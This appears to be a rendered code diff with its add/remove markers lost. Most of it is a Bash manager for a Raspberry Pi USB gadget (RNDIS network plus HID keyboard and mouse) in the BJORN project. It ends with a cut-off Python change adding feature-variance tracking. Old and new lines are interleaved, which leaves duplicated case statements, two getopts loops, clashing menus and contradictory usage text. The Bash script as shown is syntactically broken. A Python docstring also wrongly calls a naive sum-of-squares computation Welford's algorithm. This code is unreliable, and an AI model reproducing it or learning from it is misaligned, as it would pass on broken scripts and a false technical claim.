"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
local color="$NC"
case "$level" in
ERROR) color="$RED" ;;
SUCCESS) color="$GREEN" ;;
WARNING) color="$YELLOW" ;;
INFO) color="$BLUE" ;;
SECTION) color="$CYAN" ;;
esac
printf '%s\n' "$message" >> "$LOG_FILE" 2>/dev/null || true
printf '%b%s%b\n' "$color" "$message" "$NC"
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
show_recent_logs() {
if command -v journalctl >/dev/null 2>&1 && systemctl list-unit-files --type=service | grep -q "^${USB_GADGET_SERVICE}"; then
log "INFO" "Recent ${USB_GADGET_SERVICE} logs:"
journalctl -u "$USB_GADGET_SERVICE" -n 20 --no-pager 2>/dev/null || true
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
ensure_root() {
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This command must be run as root. Please use sudo."
exit 1
fi
}
service_exists() {
systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$1"
}
service_active() {
systemctl is-active --quiet "$1"
}
service_enabled() {
systemctl is-enabled --quiet "$1"
}
usb0_exists() {
ip link show usb0 >/dev/null 2>&1
}
print_divider() {
printf '%b%s%b\n' "$CYAN" "============================================================" "$NC"
}
detect_boot_paths() {
local cmdline=""
local config=""
if [ -f /boot/firmware/cmdline.txt ]; then
cmdline="/boot/firmware/cmdline.txt"
elif [ -f /boot/cmdline.txt ]; then
cmdline="/boot/cmdline.txt"
fi
if [ -f /boot/firmware/config.txt ]; then
config="/boot/firmware/config.txt"
elif [ -f /boot/config.txt ]; then
config="/boot/config.txt"
fi
printf '%s|%s\n' "$cmdline" "$config"
}
wait_for_condition() {
local description="$1"
local attempts="$2"
shift 2
local i=1
while [ "$i" -le "$attempts" ]; do
if "$@"; then
log "SUCCESS" "$description"
return 0
fi
log "INFO" "Waiting for $description ($i/$attempts)..."
sleep 1
i=$((i + 1))
done
log "WARNING" "$description not reached after ${attempts}s"
return 1
}
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install USB Gadget"
echo -e " ${BLUE}-u${NC} Uninstall USB Gadget"
echo -e " ${BLUE}-l${NC} List USB Gadget Information"
echo -e " ${BLUE}-u${NC} Bring USB Gadget up"
echo -e " ${BLUE}-d${NC} Bring USB Gadget down"
echo -e " ${BLUE}-r${NC} Reset USB Gadget (down + up)"
echo -e " ${BLUE}-l${NC} List detailed USB Gadget status"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install USB Gadget"
echo -e " $0 -u Uninstall USB Gadget"
echo -e " $0 -l List USB Gadget Information"
echo -e " $0 -h Show help"
echo -e "Examples:"
echo -e " $0 -u Start the BJORN composite gadget"
echo -e " $0 -d Stop the BJORN composite gadget cleanly"
echo -e " $0 -r Reinitialize the gadget if RNDIS/HID is stuck"
echo -e " $0 -l Show services, usb0, /dev/hidg*, and boot config"
echo -e ""
echo -e "${YELLOW}===== RNDIS Configuration Procedure =====${NC}"
echo -e "To configure the RNDIS driver and set the IP address, subnet mask, and gateway for the RNDIS network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the USB gadget, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart usb-gadget.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the RNDIS network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
echo -e "${YELLOW}This script no longer installs or removes USB Gadget.${NC}"
echo -e "${YELLOW}That part is handled by the BJORN installer.${NC}"
if [ "${1:-exit}" = "return" ]; then
return 0
fi
exit 0
}
# ============================================================
# Function to Install USB Gadget with RNDIS
# ============================================================
install_usb_gadget() {
log "INFO" "Starting USB Gadget installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Backup cmdline.txt and config.txt if not already backed up
if [ ! -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt /boot/firmware/cmdline.txt.bak
check_success "Backed up /boot/firmware/cmdline.txt to /boot/firmware/cmdline.txt.bak"
else
log "INFO" "/boot/firmware/cmdline.txt.bak already exists. Skipping backup."
fi
if [ ! -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt /boot/firmware/config.txt.bak
check_success "Backed up /boot/firmware/config.txt to /boot/firmware/config.txt.bak"
else
log "INFO" "/boot/firmware/config.txt.bak already exists. Skipping backup."
fi
# Modify cmdline.txt: Remove existing modules-load entries related to dwc2
log "INFO" "Cleaning up existing modules-load entries in /boot/firmware/cmdline.txt"
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
check_success "Removed duplicate modules-load entries from /boot/firmware/cmdline.txt"
# Add a single modules-load=dwc2,g_rndis if not present
if ! grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_rndis/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_rndis to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_rndis already present in /boot/firmware/cmdline.txt"
fi
# Add a single modules-load=dwc2,g_ether if not present
if ! grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_ether to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_ether already present in /boot/firmware/cmdline.txt"
fi
# Modify config.txt: Remove duplicate dtoverlay=dwc2 entries
log "INFO" "Cleaning up existing dtoverlay=dwc2 entries in /boot/firmware/config.txt"
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
check_success "Removed duplicate dtoverlay=dwc2 entries from /boot/firmware/config.txt"
# Append a single dtoverlay=dwc2 if not present
if ! grep -q "^dtoverlay=dwc2$" /boot/firmware/config.txt; then
echo "dtoverlay=dwc2" | sudo tee -a /boot/firmware/config.txt
check_success "Appended dtoverlay=dwc2 to /boot/firmware/config.txt"
else
log "INFO" "dtoverlay=dwc2 already present in /boot/firmware/config.txt"
fi
# Create USB gadget script
if [ ! -f /usr/local/bin/usb-gadget.sh ]; then
log "INFO" "Creating USB gadget script at /usr/local/bin/usb-gadget.sh"
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
# Enable debug mode for detailed logging
set -x
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS Network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/rndis.usb0
# Remove existing symlink if it exists to prevent duplicates
if [ -L configs/c.1/rndis.usb0 ]; then
rm configs/c.1/rndis.usb0
fi
ln -s functions/rndis.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Assign the USB Device Controller (UDC)
UDC_NAME=$(ls /sys/class/udc)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME"
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
check_success "Created and made USB gadget script executable at /usr/local/bin/usb-gadget.sh"
else
log "INFO" "USB gadget script /usr/local/bin/usb-gadget.sh already exists. Skipping creation."
fi
# Create USB gadget service
if [ ! -f /etc/systemd/system/usb-gadget.service ]; then
log "INFO" "Creating USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
check_success "Created USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
else
log "INFO" "USB gadget systemd service /etc/systemd/system/usb-gadget.service already exists. Skipping creation."
fi
# Configure network interface: Remove duplicate entries first
log "INFO" "Cleaning up existing network interface configurations for usb0 in /etc/network/interfaces"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
# Remove all lines starting with allow-hotplug usb0 and the following lines (iface and settings)
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed existing network interface configurations for usb0 from /etc/network/interfaces"
else
log "INFO" "No existing network interface configuration for usb0 found in /etc/network/interfaces."
fi
# Append network interface configuration for usb0 if not already present
if ! grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Appending network interface configuration for usb0 to /etc/network/interfaces"
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
gateway 172.20.2.1
EOF
check_success "Appended network interface configuration for usb0 to /etc/network/interfaces"
else
log "INFO" "Network interface usb0 already configured in /etc/network/interfaces"
fi
# Reload systemd daemon and enable/start services
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "INFO" "Enabling systemd-networkd service"
systemctl enable systemd-networkd
check_success "Enabled systemd-networkd service"
log "INFO" "Enabling usb-gadget service"
systemctl enable usb-gadget.service
check_success "Enabled usb-gadget service"
log "INFO" "Starting systemd-networkd service"
systemctl start systemd-networkd
check_success "Started systemd-networkd service"
log "INFO" "Starting usb-gadget service"
systemctl start usb-gadget.service
check_success "Started usb-gadget service"
log "SUCCESS" "USB Gadget installation completed successfully."
}
# ============================================================
# Function to Uninstall USB Gadget
# ============================================================
uninstall_usb_gadget() {
log "INFO" "Starting USB Gadget uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Stop and disable USB gadget service
if systemctl is-active --quiet usb-gadget.service; then
systemctl stop usb-gadget.service
check_success "Stopped usb-gadget.service"
else
log "INFO" "usb-gadget.service is not running."
fi
if systemctl is-enabled --quiet usb-gadget.service; then
systemctl disable usb-gadget.service
check_success "Disabled usb-gadget.service"
else
log "INFO" "usb-gadget.service is not enabled."
fi
# Remove USB gadget service file
if [ -f /etc/systemd/system/usb-gadget.service ]; then
rm /etc/systemd/system/usb-gadget.service
check_success "Removed /etc/systemd/system/usb-gadget.service"
else
log "INFO" "/etc/systemd/system/usb-gadget.service does not exist. Skipping removal."
fi
# Remove USB gadget script
if [ -f /usr/local/bin/usb-gadget.sh ]; then
rm /usr/local/bin/usb-gadget.sh
check_success "Removed /usr/local/bin/usb-gadget.sh"
else
log "INFO" "/usr/local/bin/usb-gadget.sh does not exist. Skipping removal."
fi
# Restore cmdline.txt and config.txt from backups
if [ -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt.bak /boot/firmware/cmdline.txt
chmod 644 /boot/firmware/cmdline.txt
check_success "Restored /boot/firmware/cmdline.txt from backup"
else
log "WARNING" "Backup /boot/firmware/cmdline.txt.bak not found. Skipping restoration."
fi
if [ -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt.bak /boot/firmware/config.txt
check_success "Restored /boot/firmware/config.txt from backup"
else
log "WARNING" "Backup /boot/firmware/config.txt.bak not found. Skipping restoration."
fi
# Remove network interface configuration for usb0: Remove all related lines
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Removing network interface configuration for usb0 from /etc/network/interfaces"
# Remove lines from allow-hotplug usb0 up to the next empty line
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed network interface configuration for usb0 from /etc/network/interfaces"
else
log "INFO" "Network interface usb0 not found in /etc/network/interfaces. Skipping removal."
fi
# Reload systemd daemon
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Disable and stop systemd-networkd service
if systemctl is-active --quiet systemd-networkd; then
systemctl stop systemd-networkd
check_success "Stopped systemd-networkd service"
else
log "INFO" "systemd-networkd service is not running."
fi
if systemctl is-enabled --quiet systemd-networkd; then
systemctl disable systemd-networkd
check_success "Disabled systemd-networkd service"
else
log "INFO" "systemd-networkd service is not enabled."
fi
# Clean up any remaining duplicate entries in cmdline.txt and config.txt
log "INFO" "Ensuring no duplicate entries remain in configuration files."
# Remove any remaining modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
# Remove any remaining dtoverlay=dwc2
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
log "INFO" "Cleaned up duplicate entries in /boot/firmware/cmdline.txt and /boot/firmware/config.txt"
log "SUCCESS" "USB Gadget uninstallation completed successfully."
}
# ============================================================
# Function to List USB Gadget Information
# ============================================================
list_usb_gadget_info() {
echo -e "${CYAN}===== USB Gadget Information =====${NC}"
local boot_pair
local cmdline_file
local config_file
# Check status of usb-gadget service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q usb-gadget.service; then
systemctl status usb-gadget.service --no-pager
boot_pair="$(detect_boot_paths)"
cmdline_file="${boot_pair%%|*}"
config_file="${boot_pair##*|}"
print_divider
log "SECTION" "BJORN USB Gadget Status"
print_divider
log "INFO" "Expected layout: RNDIS usb0 + HID keyboard /dev/hidg0 + HID mouse /dev/hidg1"
log "INFO" "Script version: ${SCRIPT_VERSION}"
log "INFO" "Log file: ${LOG_FILE}"
print_divider
log "SECTION" "Service Status"
if service_exists "$USB_GADGET_SERVICE"; then
service_active "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is active" || log "WARNING" "${USB_GADGET_SERVICE} is not active"
service_enabled "$USB_GADGET_SERVICE" && log "SUCCESS" "${USB_GADGET_SERVICE} is enabled at boot" || log "WARNING" "${USB_GADGET_SERVICE} is not enabled at boot"
else
echo -e "${RED}usb-gadget.service is not installed.${NC}"
log "ERROR" "${USB_GADGET_SERVICE} is not installed on this system"
fi
# Check if USB gadget script exists
echo -e "\n${YELLOW}USB Gadget Script:${NC}"
if [ -f /usr/local/bin/usb-gadget.sh ]; then
echo -e "${GREEN}/usr/local/bin/usb-gadget.sh exists.${NC}"
if service_exists "$DNSMASQ_SERVICE"; then
service_active "$DNSMASQ_SERVICE" && log "SUCCESS" "${DNSMASQ_SERVICE} is active" || log "WARNING" "${DNSMASQ_SERVICE} is not active"
else
echo -e "${RED}/usr/local/bin/usb-gadget.sh does not exist.${NC}"
log "WARNING" "${DNSMASQ_SERVICE} is not installed"
fi
# Check network interface configuration
echo -e "\n${YELLOW}Network Interface Configuration for usb0:${NC}"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
grep "^allow-hotplug usb0" /etc/network/interfaces -A 4
print_divider
log "SECTION" "Runtime Files"
[ -x "$USB_GADGET_SCRIPT" ] && log "SUCCESS" "${USB_GADGET_SCRIPT} is present and executable" || log "ERROR" "${USB_GADGET_SCRIPT} is missing or not executable"
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is available" || log "WARNING" "/dev/hidg0 (keyboard) is not present"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is available" || log "WARNING" "/dev/hidg1 (mouse) is not present"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 network interface exists"
ip -brief addr show usb0 2>/dev/null || true
else
echo -e "${RED}No network interface configuration found for usb0.${NC}"
log "WARNING" "usb0 network interface is missing"
fi
# Check cmdline.txt
echo -e "\n${YELLOW}/boot/firmware/cmdline.txt:${NC}"
if grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt && grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
echo -e "${GREEN}modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether are present.${NC}"
if [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "SUCCESS" "Composite gadget directory exists: /sys/kernel/config/usb_gadget/g1"
find /sys/kernel/config/usb_gadget/g1/functions -maxdepth 1 -mindepth 1 -type d 2>/dev/null || true
else
echo -e "${RED}modules-load=dwc2,g_rndis and/or modules-load=dwc2,g_ether are not present.${NC}"
log "WARNING" "No active gadget directory found under /sys/kernel/config/usb_gadget/g1"
fi
# Check config.txt
echo -e "\n${YELLOW}/boot/firmware/config.txt:${NC}"
if grep -q "^dtoverlay=dwc2" /boot/firmware/config.txt; then
echo -e "${GREEN}dtoverlay=dwc2 is present.${NC}"
print_divider
log "SECTION" "Boot Configuration"
if [ -n "$cmdline_file" ] && [ -f "$cmdline_file" ]; then
grep -q "modules-load=dwc2" "$cmdline_file" && log "SUCCESS" "dwc2 boot module load is configured in ${cmdline_file}" || log "WARNING" "dwc2 boot module load not found in ${cmdline_file}"
else
echo -e "${RED}dtoverlay=dwc2 is not present.${NC}"
log "WARNING" "cmdline.txt not found"
fi
# Check if systemd-networkd is enabled
echo -e "\n${YELLOW}systemd-networkd Service:${NC}"
if systemctl is-enabled --quiet systemd-networkd; then
systemctl is-active systemd-networkd && echo -e "${GREEN}systemd-networkd is active.${NC}" || echo -e "${RED}systemd-networkd is inactive.${NC}"
if [ -n "$config_file" ] && [ -f "$config_file" ]; then
grep -q "^dtoverlay=dwc2" "$config_file" && log "SUCCESS" "dtoverlay=dwc2 is present in ${config_file}" || log "WARNING" "dtoverlay=dwc2 not found in ${config_file}"
else
echo -e "${RED}systemd-networkd is not enabled.${NC}"
log "WARNING" "config.txt not found"
fi
echo -e "\n===== End of Information ====="
[ -f "$DNSMASQ_CONFIG" ] && log "SUCCESS" "${DNSMASQ_CONFIG} exists" || log "WARNING" "${DNSMASQ_CONFIG} is missing"
[ -f "$MODULES_LOAD_FILE" ] && log "INFO" "${MODULES_LOAD_FILE} exists (64-bit style module loading)"
[ -f "$MODULES_FILE" ] && grep -q "^libcomposite" "$MODULES_FILE" && log "INFO" "libcomposite is referenced in ${MODULES_FILE}"
[ -f "$INTERFACES_FILE" ] && grep -q "^allow-hotplug usb0" "$INTERFACES_FILE" && log "INFO" "usb0 legacy interface config detected in ${INTERFACES_FILE}"
print_divider
log "SECTION" "Quick Recovery Hints"
log "INFO" "If RNDIS or HID is stuck, run: sudo $0 -r"
log "INFO" "If startup still fails, inspect logs with: sudo journalctl -u ${USB_GADGET_SERVICE} -f"
log "INFO" "If HID nodes never appear after installer changes, a reboot may still be required"
}
bring_usb_gadget_down() {
ensure_root
print_divider
log "SECTION" "Bringing USB gadget down"
print_divider
if service_exists "$USB_GADGET_SERVICE"; then
if service_active "$USB_GADGET_SERVICE"; then
log "INFO" "Stopping ${USB_GADGET_SERVICE}..."
if systemctl stop "$USB_GADGET_SERVICE"; then
log "SUCCESS" "Stopped ${USB_GADGET_SERVICE}"
else
log "ERROR" "Failed to stop ${USB_GADGET_SERVICE}"
show_recent_logs
return 1
fi
else
log "INFO" "${USB_GADGET_SERVICE} is already stopped"
fi
else
log "WARNING" "${USB_GADGET_SERVICE} is not installed, trying direct runtime cleanup"
if [ -x "$USB_GADGET_SCRIPT" ]; then
"$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || true
fi
fi
if [ -x "$USB_GADGET_SCRIPT" ] && [ -d /sys/kernel/config/usb_gadget/g1 ]; then
log "INFO" "Running direct gadget cleanup via ${USB_GADGET_SCRIPT} stop"
"$USB_GADGET_SCRIPT" stop >> "$LOG_FILE" 2>&1 || log "WARNING" "Direct cleanup reported a non-fatal issue"
fi
if ip link show usb0 >/dev/null 2>&1; then
log "INFO" "Bringing usb0 interface down"
ip link set usb0 down >> "$LOG_FILE" 2>&1 || log "WARNING" "usb0 could not be forced down (often harmless)"
else
log "INFO" "usb0 is already absent"
fi
[ -c /dev/hidg0 ] && log "WARNING" "/dev/hidg0 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg0 is no longer exposed"
[ -c /dev/hidg1 ] && log "WARNING" "/dev/hidg1 still exists after stop (may clear on next start/reboot)" || log "SUCCESS" "/dev/hidg1 is no longer exposed"
ip link show usb0 >/dev/null 2>&1 && log "WARNING" "usb0 still exists after stop" || log "SUCCESS" "usb0 is no longer present"
}
bring_usb_gadget_up() {
ensure_root
print_divider
log "SECTION" "Bringing USB gadget up"
print_divider
if [ ! -x "$USB_GADGET_SCRIPT" ]; then
log "ERROR" "${USB_GADGET_SCRIPT} is missing. The gadget runtime is not installed."
return 1
fi
if service_exists "$USB_GADGET_SERVICE"; then
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || log "WARNING" "systemd daemon-reload reported an issue"
log "INFO" "Starting ${USB_GADGET_SERVICE}..."
if systemctl start "$USB_GADGET_SERVICE"; then
log "SUCCESS" "Start command sent to ${USB_GADGET_SERVICE}"
else
log "ERROR" "Failed to start ${USB_GADGET_SERVICE}"
show_recent_logs
return 1
fi
else
log "WARNING" "${USB_GADGET_SERVICE} is not installed, running ${USB_GADGET_SCRIPT} directly"
if "$USB_GADGET_SCRIPT" >> "$LOG_FILE" 2>&1; then
log "SUCCESS" "Runtime script executed directly"
else
log "ERROR" "Runtime script failed"
return 1
fi
fi
wait_for_condition "${USB_GADGET_SERVICE} to become active" 10 service_active "$USB_GADGET_SERVICE" || true
wait_for_condition "usb0 to appear" 12 usb0_exists || true
if service_exists "$DNSMASQ_SERVICE"; then
log "INFO" "Restarting ${DNSMASQ_SERVICE} to refresh DHCP on usb0"
systemctl restart "$DNSMASQ_SERVICE" >> "$LOG_FILE" 2>&1 || log "WARNING" "Failed to restart ${DNSMASQ_SERVICE}"
fi
[ -c /dev/hidg0 ] && log "SUCCESS" "/dev/hidg0 (keyboard) is ready" || log "WARNING" "/dev/hidg0 not present yet"
[ -c /dev/hidg1 ] && log "SUCCESS" "/dev/hidg1 (mouse) is ready" || log "WARNING" "/dev/hidg1 not present yet"
if ip link show usb0 >/dev/null 2>&1; then
log "SUCCESS" "usb0 is present"
ip -brief addr show usb0 2>/dev/null || true
else
log "WARNING" "usb0 is still missing after startup"
fi
log "INFO" "If HID is still missing after a clean start, a reboot can still be required depending on the board/kernel state"
}
reset_usb_gadget() {
ensure_root
print_divider
log "SECTION" "Resetting USB gadget (down + up)"
print_divider
bring_usb_gadget_down || log "WARNING" "Down phase reported an issue, continuing with recovery"
log "INFO" "Waiting 2 seconds before bringing the gadget back up"
sleep 2
bring_usb_gadget_up
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE} USB Gadget Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List USB Gadget Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
print_divider
echo -e "${CYAN} BJORN USB Gadget Runtime Manager v${SCRIPT_VERSION}${NC}"
print_divider
echo -e "${BLUE} 1.${NC} Bring USB Gadget up"
echo -e "${BLUE} 2.${NC} Bring USB Gadget down"
echo -e "${BLUE} 3.${NC} Reset USB Gadget (down + up)"
echo -e "${BLUE} 4.${NC} List detailed USB Gadget status"
echo -e "${BLUE} 5.${NC} Show help"
echo -e "${BLUE} 6.${NC} Exit"
echo -e ""
echo -e "${YELLOW}Note:${NC} installation/removal is no longer handled here."
echo -n -e "${GREEN}Choose an option (1-6): ${NC}"
read -r choice
case $choice in
case "$choice" in
1)
install_usb_gadget
bring_usb_gadget_up
echo ""
read -p "Press Enter to return to the menu..."
read -r -p "Press Enter to return to the menu..."
;;
2)
uninstall_usb_gadget
bring_usb_gadget_down
echo ""
read -p "Press Enter to return to the menu..."
read -r -p "Press Enter to return to the menu..."
;;
3)
list_usb_gadget_info
reset_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
read -r -p "Press Enter to return to the menu..."
;;
4)
show_usage
list_usb_gadget_info
echo ""
read -r -p "Press Enter to return to the menu..."
;;
5)
log "INFO" "Exiting USB Gadget Manager. Goodbye!"
show_usage return
echo ""
read -r -p "Press Enter to return to the menu..."
;;
6)
log "INFO" "Exiting BJORN USB Gadget Runtime Manager"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
log "ERROR" "Invalid option. Please choose between 1 and 6."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_usb_gadget
exit 0
;;
u)
uninstall_usb_gadget
exit 0
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
while getopts ":udrlhf" opt; do
case "$opt" in
u)
bring_usb_gadget_up
exit $?
;;
d)
bring_usb_gadget_down
exit $?
;;
r)
reset_usb_gadget
exit $?
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
f)
log "ERROR" "Option -f (install) has been removed. Use -u to bring the gadget up or -r to reset it."
show_usage
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

View File

@@ -65,6 +65,13 @@ class DataConsolidator:
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
# AI-01: Feature variance tracking for dimensionality reduction
self._feature_variance_min = float(
getattr(shared_data, 'ai_feature_selection_min_variance', 0.001)
)
# Accumulator: {feature_name: [sum, sum_of_squares, count]}
self._feature_stats = {}
logger.info(f"DataConsolidator initialized, exports: {self.export_dir}")
def _set_server_contact_state(self, attempted: bool, ok: Optional[bool]) -> None:
@@ -207,6 +214,9 @@ class DataConsolidator:
host_features, network_features, temporal_features, action_features
)
# AI-01: Track feature variance for dimensionality reduction
self._track_feature_variance(feature_vector)
# Determine time window
raw_ts = record['timestamp']
if isinstance(raw_ts, str):
@@ -340,6 +350,72 @@ class DataConsolidator:
logger.error(f"Error updating aggregated features: {e}")
raise
# ═══════════════════════════════════════════════════════════════════════
# AI-01: FEATURE VARIANCE TRACKING & SELECTION
# ═══════════════════════════════════════════════════════════════════════
def _track_feature_variance(self, feature_vector: Dict[str, float]):
"""
Update running statistics (mean, variance) for each feature.
Uses Welford's online algorithm via sum/sum_sq/count.
"""
for name, value in feature_vector.items():
try:
val = float(value)
except (TypeError, ValueError):
continue
if name not in self._feature_stats:
self._feature_stats[name] = [0.0, 0.0, 0]
stats = self._feature_stats[name]
stats[0] += val # sum
stats[1] += val * val # sum of squares
stats[2] += 1 # count
def _get_feature_variances(self) -> Dict[str, float]:
"""Return computed variance for each tracked feature."""
variances = {}
for name, (s, sq, n) in self._feature_stats.items():
if n < 2:
variances[name] = 0.0
else:
mean = s / n
variances[name] = max(0.0, sq / n - mean * mean)
return variances
def _get_selected_features(self) -> List[str]:
"""Return feature names that pass the minimum variance threshold."""
threshold = self._feature_variance_min
variances = self._get_feature_variances()
selected = [name for name, var in variances.items() if var >= threshold]
dropped = len(variances) - len(selected)
if dropped > 0:
logger.info(
f"Feature selection: kept {len(selected)}/{len(variances)} features "
